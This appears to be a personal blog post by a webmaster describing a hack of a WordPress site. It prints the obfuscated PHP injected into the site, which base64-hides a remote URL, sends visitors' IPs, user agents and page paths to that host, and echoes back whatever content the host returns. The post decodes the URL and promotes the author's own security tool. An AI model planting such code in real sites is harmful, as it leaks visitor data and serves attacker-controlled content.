Is it Anonymous or Anony-Mouse!
And along came the spider. A brutal hacker attack by a hacker with all the signs to point to the hacker group Anonymous. I wish someone from the FTC would contact me because I have a large amount of data collected from the hackers. They are certainly trying to utilize russian sites in their attacks, but I found one that appears to be closer to home.
Who is conqstat.com?
These hackers messed with the wrong webmaster! They didn’t know who I was, or did they remember me from their own books. You know we all have our hacking days as teenagers, but one day we out grow it, but we never lose the ability and knowledge. I have hordes of obfuscated data being revealed to me about the hacker. I have some files which provide email accounts but the following code was most interesting.
<code> if (!isset($sRetry))</code>
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&
(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr
($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent,
'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') ==
false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ //
Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2NvbnFzdGF0LmNvbS9zdGF0L3N0YXQucGhw').'?
ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode
($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER
['REQUEST_URI']).'&check='.isset($_GET['look']);
$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
So I break out my base64decoder to see who’s behind it, out comes the following url
aHR0cDovL2NvbnFzdGF0LmNvbS9zdGF0L3N0YXQucGhw = http://conqstat.com/stat/stat.php
Well. I have lots more to do, but revenge is the game. So let me think. The law enforcement agencies of the world aren’t going to do their jobs because many of these attacks use international servers. So where else can we hit them… Yep! Right in the balls! So I have released a new security application to protect wordpress sites Web Security Tools . The library of code behind it will actually work on any site, but since these hackers are building their bot-nets using wordpress sites, the best way to kick them in the balls and take them out, is to protect web sites around the world!
I must admit that I would prefer seeing them put in prison for their activities but cutting off their balls will just have to suffice for now. I miss the days when if a hacker was trying to break into your computer you could just plug your phone line into a light-socket and fry the attackers computer. Ahh, those were the good ol’ days!
More news will come as I find more information about these deviants.
